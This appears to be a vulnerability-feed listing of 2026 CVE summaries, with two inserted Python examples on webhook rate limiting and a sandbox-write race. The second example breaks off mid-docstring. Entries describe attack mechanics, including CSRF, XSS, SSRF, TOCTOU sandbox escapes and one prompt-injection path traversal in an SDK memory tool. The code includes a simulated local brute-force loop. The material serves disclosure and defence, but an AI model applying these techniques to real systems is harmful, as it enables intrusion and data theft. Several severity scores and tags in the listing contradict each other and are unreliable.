Authenticated users in WWBN AVideo 26.0 and prior can cancel arbitrary Stripe subscriptions through an exposed test.php debug endpoint in the StripeYPT plugin, exploiting a logic error in the retrieveSubscriptions() method that performs cancellation instead of retrieval. The vulnerability requires valid login credentials but allows any authenticated user, not just administrators, to trigger subscription cancellations, causing integrity violations to payment operations. No public exploit code or active exploitation has been reported at time of analysis, and vendor patches are not yet available.
PHP
Authentication Bypass
-
CVE-2026-34733
MEDIUM
CVSS 6.5
Unauthenticated remote attackers can bypass CLI-only access controls in WWBN AVideo versions 26.0 and prior via a PHP operator precedence bug in install/deleteSystemdPrivate.php, allowing HTTP access to delete server temp directory files and disclose their contents without authentication. The vulnerability stems from a logic error where !php_sapi_name() === 'cli' evaluates incorrectly due to operator binding precedence, causing the access guard to fail entirely. No public exploit code or active exploitation has been reported at the time of this analysis.
PHP
Authentication Bypass
-
CVE-2026-34732
MEDIUM
CVSS 5.3
WWBN AVideo 26.0 and prior exposes sensitive user data through 21 unauthenticated API endpoints via the CreatePlugin template generator. The list.json.php template lacks authentication checks present in its companion add.json.php and delete.json.php templates, allowing remote attackers to enumerate and retrieve user PII, payment logs, IP addresses, user agents, and internal system records without authentication. No vendor patch exists at time of analysis.
Authentication Bypass
Information Disclosure
PHP
-
CVE-2026-34716
MEDIUM
CVSS 6.4
Stored cross-site scripting (XSS) in WWBN AVideo versions 26.0 and prior allows authenticated attackers to execute arbitrary JavaScript in the browsers of online users without any victim interaction. An attacker with a user account can set their display name to an XSS payload; when they initiate a call via the YPTSocket plugin, the caller notification rendered by the jQuery Toast Plugin executes the malicious script in every connected user's browser, enabling session hijacking, credential theft, or further compromise. CVSS 6.4 reflects moderate complexity due to authentication requirement and limited direct impact scope.
XSS
RCE
-
CVE-2026-34613
MEDIUM
CVSS 6.5
CSRF vulnerability in WWBN AVideo 26.0 and prior allows unauthenticated attackers to disable critical security plugins on admin accounts via malicious web pages, exploiting missing CSRF token validation combined with SameSite=None session cookies and ORM-level security bypass. An attacker can trick an authenticated administrator into visiting a crafted webpage that silently disables plugins such as LoginControl (2FA), subscription enforcement, or access control mechanisms, compromising the platform's security posture without the admin's knowledge or consent.
CSRF
PHP
-
CVE-2026-34611
MEDIUM
CVSS 6.5
CSRF vulnerability in WWBN AVideo 26.0 and prior allows unauthenticated attackers to send arbitrary HTML emails to all platform users by luring administrators to a malicious webpage. The vulnerability exploits absent CSRF token validation on the emailAllUsers.json.php endpoint combined with SameSite=None session cookie configuration, enabling cross-origin POST requests to execute with the admin's session credentials. An attacker can impersonate the platform's legitimate SMTP sender to distribute phishing emails, spam, or malware links to the entire user base without any authentication requirement beyond initial admin compromise via social engineering.
PHP
CSRF
-
CVE-2026-34595
MEDIUM
CVSS 5.3
Parse Server versions prior to 8.6.70 and 9.7.0-alpha.18 allow authenticated users with find class-level permissions to bypass protectedFields restrictions on LiveQuery subscriptions by submitting array-like objects with numeric keys instead of proper arrays in $or, $and, or $nor operators. This enables information disclosure through a binary oracle attack that reveals whether protected fields match attacker-supplied values. The vulnerability requires prior authentication and find-level access but no user interaction, affecting all deployments of vulnerable Parse Server versions.
Node.js
Authentication Bypass
Memory Corruption
Oracle
-
CVE-2026-34586
MEDIUM
CVSS 6.5
PdfDing prior to version 1.7.1 permits authenticated users to bypass access controls on shared PDF documents by accessing content after expiration, view limits, or soft-deletion due to incomplete validation in the check_shared_access_allowed() function. The Serve and Download endpoints rely solely on session existence checks without verifying the SharedPdf.inactive or SharedPdf.deleted flags, allowing previously authorized users to retrieve sensitive content that should no longer be accessible. This authentication bypass affects all versions before 1.7.1 and requires valid authentication credentials to exploit.
Authentication Bypass
-
CVE-2026-34574
MEDIUM
CVSS 5.3
Authenticated users in Parse Server prior to versions 8.6.69 and 9.7.0-alpha.14 can bypass immutability protections on session fields by submitting null values in PUT requests to the session update endpoint, allowing indefinite session validity and circumventing configured session expiration policies. The vulnerability requires valid authentication credentials to exploit and has been patched in the specified versions.
Node.js
Authentication Bypass
-
CVE-2026-34556
MEDIUM
CVSS 6.2
Heap buffer overflow in iccDEV's icAnsiToUtf8() function allows local attackers to cause denial of service via a crafted ICC color profile processed by the iccToXml tool. The vulnerability exists in versions prior to 2.3.1.6 and stems from unsafe string handling that treats non-null-terminated buffers as C-strings, triggering out-of-bounds memory reads. CVSS 6.2 with local attack vector and no authentication required; vendor-released patch available in version 2.3.1.6.
Buffer Overflow
Information Disclosure
-
CVE-2026-34555
MEDIUM
CVSS 6.2
Stack buffer overflow in iccDEV library versions prior to 2.3.1.6 allows local attackers to cause denial of service by crafting malicious ICC color management profile files that trigger a 4-byte write overflow in CIccTagFixedNum<>::GetValues(). The vulnerability requires local access and no user interaction, with CVSS 6.2 reflecting the high availability impact. No public exploit code or active exploitation has been identified; vendor-released patch version 2.3.1.6 is available.
Buffer Overflow
Stack Overflow
-
CVE-2026-34554
MEDIUM
CVSS 6.2
Heap buffer overflow in iccDEV's CIccApplyCmmSearch::costFunc() function allows local attackers to trigger an out-of-bounds memory read via malformed JSON configuration input to the iccApplySearch tool, resulting in denial of service. The vulnerability affects iccDEV versions prior to 2.3.1.6 and has been patched; no public exploit identified at time of analysis, though the issue is straightforward to trigger with crafted input.
Buffer Overflow
Information Disclosure
-
CVE-2026-34553
MEDIUM
CVSS 4.0
Local integrity modification in iccDEV prior to version 2.3.1.6 affects the CIccCLUT::Iterate() function and CLUT dumping output in CIccMBB::Describe(), allowing local attackers without privileges to alter ICC color profile data integrity. The vulnerability requires local access and produces incorrect LUT (Look-Up Table) dump output that could compromise color management workflows relying on accurate profile representation.
Information Disclosure
-
CVE-2026-34552
MEDIUM
CVSS 6.2
Null pointer dereference in iccDEV versions prior to 2.3.1.6 causes denial of service when processing ICC color management profiles with malformed lookup table (LUT) structures. The vulnerability exists in IccTagLut.cpp where CIccApplyCLUT member access occurs without null validation, allowing local attackers to crash applications that parse untrusted color profiles. No public exploit code or active exploitation has been confirmed at time of analysis.
Null Pointer Dereference
Denial Of Service
-
CVE-2026-34551
MEDIUM
CVSS 6.2
Denial of service via null-pointer dereference in iccDEV prior to version 2.3.1.6 allows local attackers to crash the application by processing a crafted ICC color profile embedded in a TIFF file. The vulnerability exists in the CIccTagLut16::Write() function and requires local file system access but no authentication or user interaction. No public exploit code or active exploitation has been confirmed; the issue is considered moderate severity due to denial-of-service impact only (no code execution or data compromise).
Null Pointer Dereference
Denial Of Service
-
CVE-2026-34550
MEDIUM
CVSS 6.2
Denial of service in iccDEV prior to version 2.3.1.6 is caused by undefined behavior from unsafe implicit conversion of negative signed integers to unsigned size_t in IccProfLib/IccIO.cpp. Local attackers can exploit this condition to crash applications using vulnerable iccDEV libraries by providing specially crafted ICC color profile files, resulting in high availability impact with no authentication required.
Information Disclosure
-
CVE-2026-34549
MEDIUM
CVSS 6.2
A crafted ICC color profile triggers undefined behavior in iccDEV library versions prior to 2.3.1.6 through invalid left shift operations on 32-bit unsigned integers, causing application crashes and denial of service. The vulnerability affects all iccDEV versions before 2.3.1.6 and requires only local file access to exploit (no authentication or user interaction required beyond opening a malicious profile). No public exploit code or active exploitation has been identified at time of analysis.
Information Disclosure
-
CVE-2026-34548
MEDIUM
CVSS 6.2
Denial of service in iccDEV prior to version 2.3.1.6 allows local attackers to crash the iccToXml XML conversion tool via undefined behavior caused by implicit conversion of negative signed integers to unsigned 32-bit values. The vulnerability has CVSS 6.2 (medium severity) and affects all versions before the patched release; no public exploit code has been identified, but the issue is straightforward to trigger with malformed ICC color profiles containing negative integer values.
Information Disclosure
-
CVE-2026-34547
MEDIUM
CVSS 6.2
Denial of service via undefined behavior in iccDEV versions prior to 2.3.1.6 allows local attackers to crash the iccDumpProfile tool by supplying a crafted ICC color profile. The vulnerability exploits an unsafe memory operation in IccUtil.cpp triggered during profile parsing, resulting in application termination with no authentication required. No public exploit code or active exploitation has been reported at time of analysis.
Information Disclosure
-
CVE-2026-34546
MEDIUM
CVSS 6.2
Denial of service via division by zero in iccDEV prior to version 2.3.1.6 allows local attackers to crash the iccTiffDump utility by supplying a crafted TIFF file, resulting in undefined behavior and availability impact. The vulnerability requires local file access and no authentication, but exploitation is limited to denial of service rather than code execution or information disclosure. CVSS 6.2 reflects medium severity with high availability impact; no public exploitation or CISA KEV status reported.
Information Disclosure
-
CVE-2026-34542
MEDIUM
CVSS 6.2
Stack buffer overflow in iccDEV library versions prior to 2.3.1.6 allows local attackers to trigger a denial of service by crafting a malicious ICC color profile that overflows a 4-byte stack buffer in the CIccCalculatorFunc::Apply() function during profile processing. The vulnerability requires local access and no user interaction, with CVSS 6.2 reflecting high availability impact but no direct code execution path; vendor-released patch is available in version 2.3.1.6.
Stack Overflow
Buffer Overflow
-
CVE-2026-34541
MEDIUM
CVSS 6.2
Denial of service in iccDEV prior to version 2.3.1.6 allows local attackers to crash the iccApplyNamedCmm tool by supplying a malformed ICC color profile that triggers a null-pointer dereference in the CIccCombinedConnectionConditions constructor. The vulnerability requires local file system access to provide the crafted profile and causes application termination with no code execution or data corruption, affecting users processing untrusted ICC profiles through the -PCC flag.
Null Pointer Dereference
Denial Of Service
-
CVE-2026-34540
MEDIUM
CVSS 6.2
Heap buffer overflow in iccDEV prior to version 2.3.1.6 allows denial of service via a crafted ICC color profile that triggers out-of-bounds heap read in icMemDump() when iccDumpProfile processes malformed tag contents. The vulnerability affects local attackers without authentication or user interaction, though the practical attack surface depends on how iccDumpProfile is invoked in consuming applications. No public exploit code or active exploitation has been identified; the issue was discovered through code analysis and AddressSanitizer instrumentation.
Heap Overflow
Buffer Overflow
-
CVE-2026-34539
MEDIUM
CVSS 6.2
Heap buffer overflow in iccDEV's CTiffImg::WriteLine() function allows local attackers to crash the iccSpecSepToTiff tool via specially crafted ICC color profile and TIFF file pairs. Versions prior to 2.3.1.6 are vulnerable; the attack requires no authentication or user interaction beyond processing a malicious file. While the current impact is limited to denial of service, heap overflows can potentially enable memory corruption exploitation depending on heap layout and attacker sophistication.
Heap Overflow
Buffer Overflow
-
CVE-2026-34537
MEDIUM
CVSS 6.2
Local denial of service in iccDEV prior to version 2.3.1.6 allows unauthenticated local attackers to crash applications processing ICC color profiles by crafting malicious profiles that trigger undefined behavior through invalid enum values in CIccOpDefEnvVar::Exec(). The vulnerability requires local file access but no privilege escalation, with an EPSS score of 6.2 reflecting moderate real-world risk. No public exploit code or active exploitation has been identified at the time of analysis.
Information Disclosure
-
CVE-2026-34536
MEDIUM
CVSS 6.2
Stack overflow in iccDEV's SIccCalcOp::ArgsUsed() function allows local attackers to trigger a denial of service by supplying a crafted ICC color profile to iccApplyProfiles. The vulnerability affects iccDEV versions prior to 2.3.1.6 and requires no authentication or user interaction; exploitation manifests as application crash during calculator argument computation. No public exploit code or active exploitation has been identified at time of analysis.
Denial Of Service
-
CVE-2026-34535
MEDIUM
CVSS 6.2
Malformed ICC color profile files trigger a heap buffer overflow in iccDEV versions prior to 2.3.1.6, causing denial of service through segmentation fault in the CIccTagArray::Cleanup() function. Local attackers can exploit this vulnerability by crafting a malicious ICC profile that, when processed by iccRoundTrip or similar tools, crashes the application due to misaligned pointer access. No public exploit code has been identified, and this vulnerability is not confirmed as actively exploited in the wild.
Heap Overflow
Buffer Overflow
-
CVE-2026-34534
MEDIUM
CVSS 6.2
Heap buffer overflow in iccDEV prior to version 2.3.1.6 allows local attackers to trigger a denial of service via a malicious ICC color profile, causing out-of-bounds heap reads in the CIccMpeSpectralMatrix::Describe() function when processing profiles with iccDumpProfile. The vulnerability requires local file access but no user interaction or authentication, with confirmed patch availability in version 2.3.1.6.
Heap Overflow
Buffer Overflow
-
CVE-2026-34533
MEDIUM
CVSS 6.2
Undefined Behavior in iccDEV prior to version 2.3.1.6 allows local attackers to cause a denial of service by supplying a crafted ICC color profile containing invalid enum values for icChannelFuncSignature, which triggers an application crash during profile processing in CIccCalculatorFunc::ApplySequence(). The vulnerability requires local file access or the ability to provide a malicious ICC profile to an application using the library; no public exploit code has been identified.
Information Disclosure
-
CVE-2026-34531
MEDIUM
CVSS 6.5
Flask-HTTPAuth versions prior to 4.8.1 allow authentication bypass when applications store empty string tokens in their user database, enabling unauthenticated attackers to authenticate as any user with an empty token set by submitting requests without a token or with an empty token value. This affects only token-based authentication mechanisms that verify tokens via database lookup rather than cryptographic means (e.g., JWTs). CVSS score 6.5 reflects moderate integrity impact with low computational attack complexity, and no public exploit code has been identified at the time of analysis.
Python
Authentication Bypass
-
CVE-2026-34530
MEDIUM
CVSS 6.9
Stored cross-site scripting in File Browser via admin-controlled branding fields allows injection of persistent JavaScript that executes for all visitors, including unauthenticated users. The vulnerability stems from use of Go's text/template (which performs no HTML escaping) instead of html/template when rendering the SPA index.html with branding data. An authenticated admin can inject malicious payloads into branding.name or branding.color fields that break out of their intended HTML context and execute arbitrary JavaScript in every user's browser without restriction, as no Content-Security-Policy header is set. Affected versions through v2.62.1 are vulnerable; vendor-released patches are available.
XSS
Python
Docker
-
CVE-2026-34508
MEDIUM
CVSS 6.3
OpenClaw before version 2026.3.12 allows authenticated attackers to bypass rate limiting on webhook secret validation by exploiting a logic flaw that applies rate limits only after successful authentication, enabling brute-force attacks against webhook credentials and injection of forged Zalo webhook traffic. The vulnerability requires authenticated access but results in high-confidence credential compromise.
Authentication Bypass
-
CVE-2026-34505
MEDIUM
CVSS 6.9
Webhook secret brute-forcing in OpenClaw before 2026.3.12 enables attackers to forge authenticated webhooks by exploiting pre-authentication rate limit bypass. Unauthenticated remote attackers can systematically guess webhook secrets without triggering rate limiting (which only applies post-authentication), then submit forged webhook payloads to compromise system integrity and confidentiality. CVSS 9.8 (Critical) with network attack vector and no authentication required. No public exploit identified at time of analysis, though exploitation requires only standard HTTP tooling. EPSS data not available; exploitation appears automatable given the straightforward nature of brute-force attacks against webhook endpoints.
Authentication Bypass
-
CVE-2026-34504
MEDIUM
CVSS 6.9
Server-side request forgery in OpenClaw before 2026.3.28 allows unauthenticated remote attackers to fetch internal URLs through unguarded image download operations in the fal provider image-generation-provider.ts component, enabling exposure of internal service metadata and responses via the image pipeline. CVSS 5.3 indicates moderate integrity impact without authentication requirements. No public exploit code or active exploitation confirmed at time of analysis.
SSRF
-
CVE-2026-34452
MEDIUM
CVSS 5.8
Symlink race condition in Anthropic Python SDK async filesystem memory tool (versions 0.86.0-0.86.x) allows local authenticated attackers to escape sandbox restrictions and read or write arbitrary files outside the designated memory directory. The vulnerability exploits a time-of-check-time-of-use (TOCTOU) flaw where path validation occurs before symlink resolution, enabling an attacker with memory directory write access to redirect file operations via symlink manipulation. The synchronous implementation is unaffected. Vendor-released patch: version 0.87.0.
Python
Information Disclosure
-
CVE-2026-34451
MEDIUM
CVSS 6.3
Path traversal vulnerability in Anthropic Claude SDK for TypeScript (versions 0.79.0-0.80.x) allows remote attackers to read and write files outside the intended sandboxed memory directory via prompt injection. The vulnerability exploits incomplete path validation in the local filesystem memory tool, where a model supplied with crafted input can reference sibling directories sharing the memory root's name prefix. Patch available in version 0.81.0; no public exploit code or active exploitation confirmed, but the attack surface is exposed to any application using the affected SDK versions with model-supplied file paths.
Path Traversal
-
CVE-2026-34450
MEDIUM
CVSS 4.8
Anthropic Python SDK versions 0.86.0 to before 0.87.0 create memory files with overly permissive file permissions (0o666), allowing local attackers to read persisted agent state or modify memory files to influence model behavior on shared hosts and Docker environments. The vulnerability affects both synchronous and asynchronous memory tool implementations and has been patched in version 0.87.0; no public exploit code or active exploitation has been identified at the time of analysis.
Python
Privilege Escalation
Docker
-
CVE-2026-34443
MEDIUM
CVSS 6.9
FreeScout prior to version 1.8.211 has incomplete Server-Side Request Forgery (SSRF) protections due to a flawed IP range check in checkIpByMask() that only accepts CIDR notation and rejects plain IP addresses, leaving the entire 10.0.0.0/8 and 172.16.0.0/12 private IP ranges unprotected from SSRF attacks. Remote attackers can exploit this logic error to access internal services and resources on private networks that the application can reach, potentially escalating to information disclosure or further lateral movement. The vulnerability is confirmed patched in version 1.8.211.
PHP
SSRF
-
CVE-2026-34442
MEDIUM
CVSS 5.4
Host header manipulation in FreeScout prior to version 1.8.211 allows unauthenticated remote attackers to inject arbitrary domains into application-generated absolute URLs, enabling open redirects and external resource loading attacks. The vulnerability exploits unvalidated Host header values to construct malicious links and asset references, potentially redirecting users to attacker-controlled domains or loading external resources from compromised servers. CVSS 5.4 reflects low-to-moderate real-world risk given the requirement for user interaction (UI:R), though no active exploitation has been publicly confirmed.
Open Redirect
-
CVE-2026-34441
MEDIUM
CVSS 4.8
HTTP Request Smuggling in cpp-httplib prior to 0.40.0 allows remote attackers to inject arbitrary HTTP requests on HTTP/1.1 keep-alive connections by embedding malicious request data in the body of GET requests that the static file handler does not consume. The unread body bytes remain on the TCP stream and are interpreted as a new request, enabling information disclosure and request manipulation without authentication or user interaction.
Request Smuggling
Information Disclosure
-
CVE-2026-34405
MEDIUM
CVSS 6.1
Nuxt OG Image versions prior to 6.2.5 allow cross-site scripting (XSS) attacks via arbitrary HTML attribute injection in the image-generation endpoint at /_og/d/, affecting any unauthenticated remote user who can craft a malicious URI. An attacker can inject attributes into the HTML page body to execute JavaScript in the context of users' browsers, compromising confidentiality and integrity without service disruption. No public exploit code or active exploitation has been confirmed at the time of analysis.
XSS
-
CVE-2026-34404
MEDIUM
CVSS 6.9
Nuxt OG Image versions prior to 6.2.5 are vulnerable to denial of service through unbounded image dimension parameters in the /_og/d/ endpoint. Attackers can specify arbitrarily large width and height values, causing the image-generation component to consume excessive CPU and memory resources, resulting in application unavailability. No authentication is required to exploit this vulnerability.
Denial Of Service
-
CVE-2026-34401
MEDIUM
CVSS 6.5
XML Notepad versions prior to 2.9.0.21 allow remote attackers to leak local file contents or capture NTLM credentials via crafted XML files with malicious DTDs, exploiting disabled-by-default DTD processing that automatically resolves external entities. The vulnerability requires user interaction (opening a malicious XML file) but poses significant confidentiality risk on Windows systems where NTLM credential interception is feasible. Microsoft released patched version 2.9.0.21 to address this XXE (XML External Entity) issue.
Microsoft
XXE
-
CVE-2026-34400
MEDIUM
CVSS 6.9
SQL injection in Alerta's Query string search API (q= parameter) allows unauthenticated remote attackers to execute arbitrary SQL commands against the underlying PostgreSQL database. The vulnerability stems from unsafe f-string interpolation of user-supplied search terms directly into SQL WHERE clauses without parameterization. Alerta versions prior to 9.1.0 are affected; the vulnerability has been patched in version 9.1.0 with no public exploit code identified at time of analysis.
PostgreSQL
SQLi
-
CVE-2026-34396
MEDIUM
CVSS 6.1
Stored cross-site scripting (XSS) in WWBN AVideo 26.0 and prior allows unauthenticated attackers to inject malicious JavaScript into plugin configuration values via CSRF, or authenticated admins to directly inject code that executes in administrator browsers when accessing plugin configuration pages. The vulnerability exploits missing output encoding in the jsonToFormElements() function, enabling arbitrary JavaScript execution within the admin panel with impact to confidentiality and integrity.
XSS
PHP
CSRF
-
CVE-2026-34395
MEDIUM
CVSS 6.5
Information disclosure in WWBN AVideo versions 26.0 and prior allows authenticated users to enumerate and dump the complete user database including personal information and wallet balances via the /plugin/YPTWallet/view/users.json.php endpoint. The vulnerability stems from inadequate authorization checks that verify user login status but fail to enforce administrator-only access, enabling any registered account holder to retrieve sensitive data belonging to all platform users. No public exploit code or active exploitation has been confirmed at time of analysis, and vendor patches are not yet available.
Authentication Bypass
PHP
-
CVE-2026-34384
MEDIUM
CVSS 4.5
Admidio prior to version 5.0.8 allows attackers with pending registration status to bypass CSRF protections and trick administrators with approval rights into automatically approving registrations via malicious URLs, enabling unauthorized account activation without manual review. The vulnerability affects the create_user, assign_member, and assign_user action modes in modules/registration.php, which process GET requests without token validation unlike the delete_user mode in the same file. An attacker extracts their user UUID from a registration confirmation email, crafts a URL targeting administrators, and gains illicit account approval through social engineering rather than technical compromise.
PHP
CSRF
-
CVE-2026-34383
MEDIUM
CVSS 4.3
Admidio versions prior to 5.0.8 allow authenticated users to bypass CSRF token validation and server-side form validation in the inventory module's item_save endpoint by setting the imported POST parameter to true, enabling unauthorized modification of inventory item data without proper security checks. The vulnerability requires valid authentication but carries moderate impact due to the complete circumvention of two independent security controls.
CSRF
-
CVE-2026-34382
MEDIUM
CVSS 4.6
Admidio 5.0.0 through 5.0.7 allows authenticated users to permanently delete list configurations via CSRF attacks against the mylist_function.php delete handler, which lacks CSRF token validation. An attacker can craft a malicious page to silently destroy a victim's shared list configurations, including organization-wide lists if the victim holds administrator rights. No public exploit code has been identified at time of analysis. Vendor-released patch: version 5.0.8.
PHP
CSRF
-
CVE-2026-34235
MEDIUM
CVSS 6.9
Heap out-of-bounds read in PJSIP's VP9 RTP unpacketizer allows remote attackers to read memory beyond allocated buffer boundaries by sending crafted VP9 Scalability Structure data, potentially disclosing sensitive information. PJSIP versions prior to 2.17 are affected. The vulnerability requires network access but no authentication or user interaction, with a CVSS score of 6.9 indicating moderate severity driven by availability impact. Vendor-released patch available in version 2.17.
Information Disclosure
Buffer Overflow
-
CVE-2026-34227
MEDIUM
CVSS 5.9
In Sliver prior to version 1.7.4, unauthenticated attackers can hijack all active C2 sessions and beacons through a single malicious link clicked by an operator, gaining immediate silent control to exfiltrate collected intelligence or destroy compromised infrastructure. The vulnerability exploits browser-based interaction with the custom Wireguard netstack, bypassing authentication entirely via a user-interaction attack vector. This is a critical supply-chain risk for red teams and penetration testers relying on Sliver for command-and-control operations.
Authentication Bypass
-
CVE-2026-34218
MEDIUM
CVSS 6.3
ClearanceKit on macOS fails to enforce managed and user-defined file-access policies during startup, allowing local processes to bypass intended access controls until GUI interaction triggers policy reloading. The vulnerability affects ClearanceKit versions prior to 4.2.14, where two startup defects create a window in which only a hardcoded baseline rule is enforced, leaving the system vulnerable to privilege escalation and unauthorized file access. This issue is not confirmed actively exploited, but the trivial attack vector (local, no authentication) and high integrity/system impact make it a meaningful risk for systems relying on ClearanceKit for file-access enforcement.
Apple
Privilege Escalation
-
CVE-2026-34206
MEDIUM
CVSS 6.1
Reflected cross-site scripting (XSS) in Captcha Protect versions prior to 1.12.2 allows unauthenticated remote attackers to inject arbitrary script into the anti-bot challenge page by supplying a crafted destination parameter. The vulnerability exploits unsafe use of Go's text/template library, which does not perform contextual HTML escaping, enabling attackers to break out of HTML attributes and execute malicious code in the context of users viewing the challenge page. This affects all Traefik middleware deployments using vulnerable versions of libops/captcha-protect.
XSS
-
CVE-2026-33580
MEDIUM
CVSS 6.3
Brute-force attacks against OpenClaw webhook authentication allow unauthenticated remote attackers to forge Nextcloud Talk webhook events by exploiting missing rate limiting on shared secret validation. Affecting OpenClaw versions prior to 2026.3.28, attackers can repeatedly attempt authentication without throttling to compromise weak shared secrets and inject malicious webhook payloads. CVSS 9.8 critical severity reflects a network-accessible attack surface requiring no authentication. No public exploit identified at time of analysis, and EPSS data is not available. Vendor-released patch available via commit e403decb6e20091b5402780a7ccd2085f98aa3cd.
Information Disclosure
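As an added example (not OpenClaw's or Nextcloud's code), the shape of the fix for the entry above: a webhook verifier that compares the signature in constant time and locks out a source after repeated failures, next to the unthrottled check that lets an online brute force run at wire speed. The signing scheme (hex HMAC-SHA256 over nonce plus body), the demo secret, the event body and the source addresses are assumptions constructed for the example.

```python
import hashlib
import hmac
import time
from collections import defaultdict, deque

# Constructed demo secret; a real deployment loads it from configuration.
SHARED_SECRET = b"correct-horse-battery-staple"


def sign(secret: bytes, nonce: str, body: bytes) -> str:
    """Assumed signing scheme (not verified against Nextcloud Talk or
    OpenClaw): hex(HMAC-SHA256(secret, nonce || body))."""
    return hmac.new(secret, nonce.encode() + body, hashlib.sha256).hexdigest()


class AttemptLimiter:
    """Sliding-window failure counter keyed by source (e.g. client IP).

    After `max_failures` bad signatures inside `window` seconds the source
    is refused outright, so an online guess of a weak secret cannot run at
    wire speed. `clock` is injectable for deterministic tests.
    """

    def __init__(self, max_failures: int = 5, window: float = 60.0, clock=time.monotonic):
        self.max_failures = max_failures
        self.window = window
        self.clock = clock
        self._failures: dict[str, deque] = defaultdict(deque)

    def blocked(self, source: str) -> bool:
        now = self.clock()
        q = self._failures[source]
        while q and now - q[0] > self.window:
            q.popleft()
        return len(q) >= self.max_failures

    def record(self, source: str, ok: bool) -> None:
        if ok:
            self._failures.pop(source, None)
        else:
            self._failures[source].append(self.clock())


def verify_unthrottled(nonce: str, body: bytes, signature: str) -> bool:
    """Vulnerable pattern: every attempt is evaluated, and `==` stops at the
    first differing byte, leaking timing on top of unlimited tries."""
    return sign(SHARED_SECRET, nonce, body) == signature


def verify_throttled(source: str, nonce: str, body: bytes, signature: str,
                     limiter: AttemptLimiter) -> bool:
    """Hardened check: refuse locked-out sources before doing any work,
    compare in constant time, and count the outcome against the source."""
    if limiter.blocked(source):
        return False
    expected = sign(SHARED_SECRET, nonce, body)
    # compare_digest needs same-type ASCII inputs; anything else is a failure.
    ok = isinstance(signature, str) and signature.isascii() and \
        hmac.compare_digest(expected, signature)
    limiter.record(source, ok)
    return ok


def brute_force_demo(limiter: AttemptLimiter, attempts: int = 20) -> tuple:
    """Constructed attacker replaying one forged event with `attempts` wrong
    signatures from a single source. Returns (evaluated, refused)."""
    body = b'{"type":"Create","object":{"content":"forged"}}'
    evaluated = refused = 0
    for i in range(attempts):
        if limiter.blocked("203.0.113.7"):
            refused += 1
            continue
        verify_throttled("203.0.113.7", "nonce-1", body, f"{i:064x}", limiter)
        evaluated += 1
    return evaluated, refused
```

With the default limiter, 20 guesses from one address get 5 evaluated and 15 refused; a correct signature from a locked-out source is refused too until the window expires, which is the intended trade-off. Keying on source alone is not enough against a distributed guesser, so the secret itself still has to be long and random.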
-
CVE-2026-33578
MEDIUM
CVSS 5.3
Authorization policy bypass in OpenClaw messaging extensions allows unauthenticated remote attackers to circumvent sender allowlist restrictions and interact with bots without authorization. The vulnerability affects OpenClaw versions prior to 2026.3.28, specifically the Google Chat and Zalouser extensions, where route-level group allowlist policies silently downgrade to an open policy during resolution. The attack is network-accessible, requires no authentication, has low complexity and needs no user interaction, so this represents a significant access control failure; EPSS data is unavailable and no public exploit was identified at time of analysis.
Authentication Bypass
Google
-
CVE-2026-33576
MEDIUM
CVSS 6.9
Unauthenticated attackers can force OpenClaw versions before 2026.3.28 to download and store arbitrary media files sent through Zalo messaging channels, because media is fetched before the sender authorization check runs. Remote exploitation without authentication consumes network bandwidth and storage on the host. No public exploit identified at time of analysis, though the attack is straightforward given that ordering. Vendor-released patch available via commit 68ceaf7a5.
Authentication Bypass
-
CVE-2026-33415
MEDIUM
CVSS 5.1
Discourse versions 2026.1.0-2026.1.2, 2026.2.0-2026.2.1, and 2026.3.0-beta allow authenticated moderators to bypass category permission controls and retrieve post content, topic titles, and usernames from categories they lack authorization to access via a sentiment analytics endpoint. Patches are available (2026.1.3, 2026.2.2, 2026.3.0); no public exploit code or active exploitation has been identified.
Authentication Bypass
-
CVE-2026-33300
MEDIUM
CVSS 5.3
Discourse 2026.1.0 through 2026.3.0-beta allows authenticated moderators to bypass authorization controls in the Category Chatables Controller, disclosing sensitive information about hidden group names and user counts. The vulnerability affects multiple release branches and has been patched in versions 2026.1.3, 2026.2.2, and 2026.3.0. With a CVSS score of 5.3 and low attack complexity, this represents a meaningful information disclosure risk requiring prompt patching.
Information Disclosure
-
CVE-2026-33185
MEDIUM
CVSS 5.3
Server-side request forgery (SSRF) in Discourse group email settings test endpoint allows authenticated non-staff group owners to initiate outbound connections to arbitrary hosts and ports, enabling internal network reconnaissance. Affects Discourse 2026.1.0-2026.1.2, 2026.2.0-2026.2.1, and 2026.3.0-rc versions. Patched in 2026.1.3, 2026.2.2, and 2026.3.0. No public exploit code or active exploitation confirmed at time of analysis.
SSRF
-
CVE-2026-33074
MEDIUM
CVSS 6.3
Discourse versions 2026.1.0-2026.1.2, 2026.2.0-2026.2.1, and 2026.3.0-pre allow authenticated users to escalate their subscription tier by purchasing a lower-cost plan while obtaining benefits reserved for higher-tier subscriptions. The vulnerability has a CVSS 6.3 score reflecting the integrity impact, requires high attack complexity and partial timing conditions, but affects confidentiality minimally. Vendor-released patches address the flaw in versions 2026.1.3, 2026.2.2, and 2026.3.0, and the exploit likely requires knowledge of the subscription grant mechanism.
Privilege Escalation
-
CVE-2026-32988
MEDIUM
CVSS 5.8
Sandbox escape in OpenClaw (before version 2026.3.11) allows local authenticated users to write arbitrary files outside validated directories via a TOCTOU race condition during staged file writes. The fs-bridge component fails to anchor temporary file operations to verified parent directories, so an attacker who swaps a path alias (for example, replacing a validated directory with a symlink) between the validation and commit steps redirects the final write. The local attack vector and high complexity temper the score, but a successful race crosses the sandbox boundary. No public exploit identified at time of analysis, though the race condition vulnerability class (CWE-367) is well-understood by attackers.
Authentication Bypass
-
CVE-2026-32977
MEDIUM
CVSS 5.8
OpenClaw before 2026.3.11 allows authenticated local attackers to bypass sandbox boundaries and write files outside validated paths via a time-of-check-time-of-use race condition in the fs-bridge writeFile commit operation. An attacker with local access and sufficient privileges can exploit unanchored container paths during file move operations to redirect committed files outside the sandbox, achieving arbitrary file write capabilities within the container mount namespace. No public exploit code or active exploitation has been confirmed.
Authentication Bypass
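As an added example modelled on the bug class in the two OpenClaw fs-bridge entries above (CVE-2026-32988 and CVE-2026-32977), not the project's code: the vulnerable commit that validates and then operates on path strings, beside one anchored to a file descriptor of the verified parent directory. The sandbox layout, file names and the `race_hook` callback that stands in for the attacker winning the race are constructed; the example is POSIX-only because it relies on the `dir_fd` arguments of `os.open` and `os.rename`.

```python
import os
import shutil
import tempfile


def validate_under(sandbox: str, rel: str) -> str:
    """Check-time validation shared by both versions: resolve the requested
    path and confirm it lies inside the sandbox root."""
    root = os.path.realpath(sandbox)
    target = os.path.realpath(os.path.join(root, rel))
    if os.path.commonpath([root, target]) != root:
        raise PermissionError(f"{rel!r} escapes the sandbox")
    return target


def commit_write_vulnerable(sandbox: str, rel: str, data: bytes, race_hook=None) -> str:
    """Vulnerable pattern: validate by path string, then stage and rename by
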